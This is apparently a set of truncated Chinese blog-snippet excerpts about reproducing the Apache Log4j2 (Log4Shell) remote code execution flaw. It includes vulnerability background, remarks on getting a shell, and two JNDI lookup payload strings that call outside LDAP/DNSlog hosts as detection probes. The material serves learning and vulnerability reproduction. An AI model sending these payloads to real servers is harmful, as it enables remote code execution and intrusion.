最近最热门的无非是最近爆出的超大boss—Apache log4j2组件的rce漏洞。安全圈俗称'过年'，漏洞影响范围之广，危害之大堪比当年的永恒之蓝。由于最近爆出，危害程度目前还正在不断扩大中。超多的大佬已经复现了，那么作为网络安全的小白，不复现一下就是对不起自己。！！！ 　　Apache ...

第一条，心中无女人，挖洞自然神。 白帽守则第一页第二条，只有不努力的白帽，没有挖不到的漏洞 对此我深表 ...

0x01 漏洞描述 Apache Log4j2是一款优秀的Java日志框架。2021年11月24日，阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞。由于Apache Log4j2某些功能存在递归解析功能，攻击者可直接构造恶意请求，触发远程代码执行漏洞。漏洞利用 ...

0X00-引言 过年了，放炮 这个漏洞真牛逼，日天，日地，日空气 2021年12月10日凌晨，我正坐在马桶上，突然看到厕纸上面出现一串神秘代码${jndi:ldap://kao5b1ig.ns.dns3.cf.} ,我赶紧起身，打开电脑一看，网页dnslog弹出记录，我大惊，紧接 ...

本次记录自己测试时每一步操作，很详细。 本次复现分为curl测试和拿shell两种操作，测试完curl后体验时长到期了，只能换环境了。 本次测试环境如下： curl------------------------------------------------------ 靶场 ...

log4j简介 Apache Log4j是一个用于Java的日志记录库，其支持启动远程日志服务器。 Log4j 1.2 中包含一个 SocketServer 类，该类容易受到不可信数据反序列化的影响，当侦听不可信网络流量以获取日志数据时，该类可被利用与反序列化小工具结合使用以远程执行任意代码 ...

pom.xml 中: 远端: 定义一个RMI Service 定义一个需要注入的对象 client 端 执行后发现 Eval 被加载了 ...

二、漏洞复现 2.1 使用DNLOG平台查看回显 可以使用相关的dnslog平台查看，也可以使用burp自带的dnslog进行查看，我这里使用的是 http://dnslog.cn/ ${jndi:ldap://rbmanr.dnslog.cn/exp} 有回显，说明存在该漏洞 ...